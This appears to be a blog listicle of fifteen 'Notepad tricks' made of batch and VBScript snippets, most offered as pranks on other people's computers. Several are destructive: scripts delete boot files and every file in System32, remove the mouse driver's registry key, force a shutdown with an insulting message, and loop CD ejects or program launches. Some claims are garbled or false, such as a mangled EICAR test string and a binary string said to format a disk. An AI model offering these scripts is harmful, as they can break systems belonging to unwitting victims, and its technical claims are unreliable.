15 Best Notepad Tricks and Hacks

by admin
0 comment 4 min read
Notepad laptop Digital

Notepad is a very common software that we use in our daily lives from time to time to take short notes take long notes quickly added something even if it’s just for copy and paste purposes. but do you know there are a lot of things you can do with using notepad well you might not be familiar with these tricks in this article we are going to tell you about some very cool notepad tricks that you can use with your Windows 10 notepad to take it to a whole new level? Before you before using these tricks keep in mind that they might not work for your pc depending upon the windows version you are using on the windows patch update your system has but it’s always fun to try these tricks!


We mostly use notepad only for just typing purposes or note-taking, but In this article, I will tell you about some tricks and hacks about notepad.

HERE ARE THR NOTEPAD TRICKS:

1] Notepad trick to Test Antivirus:

With this trick, you can easily test whether your antivirus working perfectly or not. Hackers use this small line of code to test whether antivirus is active or not?

X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*

Save this file as hack.exe and run the file and check if your antivirus detects it then your antivirus is working perfectly otherwise change your antivirus because it’s useless.

2] Make A Personal Log-Book or A Diary With Notepad Trick

Just open notepad and add .LOG to the beginning of notepad and save it as log.txt Done! Now you’re all set, every time you will get Date-Time before writing anything. I use this all time to keep logs with time.

.LOG

3] Constantly Repeat Any Messages

This is one of the Coolest Notepad tricks that will repeat any of the messages on the computer screen repeatedly in loop. Just copy the below code and paste in the notepad and save it as “message.bat”. Note that the extension must be .bat to work it.

@ECHO off
:Begin
msg * Hi
msg * Follow TechHacksaver
msg * WEBSITE: Techhacksaver.com
msg * GET AAWESOME TRICKS
msg * Learn Hacking
GOTO BEGIN

4] Notepad Trick to type slowly

This trick will let you type slowly on the screen with respect to time and slower than usual speed and to do so, just copy the below code and paste it in notepad save it with “anyname.vbs” name.

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject (“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate Notepad“”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

5] Tell your friend a message and shut down his / her computer

All you have to do is copy the below code and paste in the notepad and save its as “anyname.bat”.

@echo off
msg * Hey how are you
shutdown -c “Error! You are really a stupid! Please Get a Trreatement IDIOT” -s

6] Continually pop out CD Drive Using Notepad trick

This trick continually pops out the CD drive whenever you try to close it, it will open again! A nice trick to irritate someone and make them angry. Like always Just copy and paste the code in notepad and save with extension .vbs [depending upon drivers, this might not work on latest version of windows 10]

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

7] Matrix Effect– Random Character

This will print random character on screen giving you a MATRIX MOVIE like effect, open notepad and Copy paste the below code save it with extension .bat

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

8] Format Hard Disk Using Just Notepad trick [BE CAREFUL]

The following code will delete all your hard drive data and forced you to format it. Just be very careful while using it all you have to do is copy code and paste in notepad and save it as “anyname.exe”. Note that .exe file extension is a must and run it as administrator. [This was due a vulnerability and may not work for all versions]

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

9] Convert Text Into Audio Using Notepad

This is another very cool notepad-trick and this code will convert your text into an audio file. Like always copy the below code and paste it into notepad and save it as “text-to-audio.vbs” Extension must be .vbs

Dim message, sapi message=InputBox(“Enter your text for conversion–Techhacksaver.com”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message

10] Fake Error Message

Open the notepad and paste the code and save the file as error.vbs. Now when you or anyone will open the file you will see an error message. from the following code, you can modify message under quotes ” “

X=Msgbox(“Put your Message Here”,0+16,”Put Title Here”)

11] Open Notepad or Any Other Program Continuously

This trick is awesome if you want to prank a friend or annoy someone. Just open notepad and copy-paste the following code and runt it. save the file as .bat . If you want to change the program instead of notepad then simply change the path of file, you will find it under %SYSTEMROOT% now change that line from code. DONE!

@ECHO OFF

:TOP

START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE

GOTO TOP

12] Disable Mouse Controls

This code will disable mouse control, prank your friend that their mouse is not working properly.
Paste the below code in notepad and save it as disablemouse.bat in your computer.

rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

13] Hit Enter Continuously

Copy and paste below code into notepad and Save the file as .vbs extension

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

14] Delete Startup Files

This might seriously damage your system so be careful, copy & paste code and save it with the extension .bat

@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

15] Deleting System32 Files Using Notepad

System32 saves all core file of windows 10 so it can be called as heart of OS, Copy and paste code with extension .bat

DEL C:\WINDOWS\SYSTEM32\*.*/Q

Closing Words: So that was all for this post, I truly wish that all of these tricks that I shared within this post worked for you, and If you really like this article make sure you share this with everybody & make sure you bookmark this for your future reference and also to comment below this post and share your thoughts.

Related Articles

Leave a Comment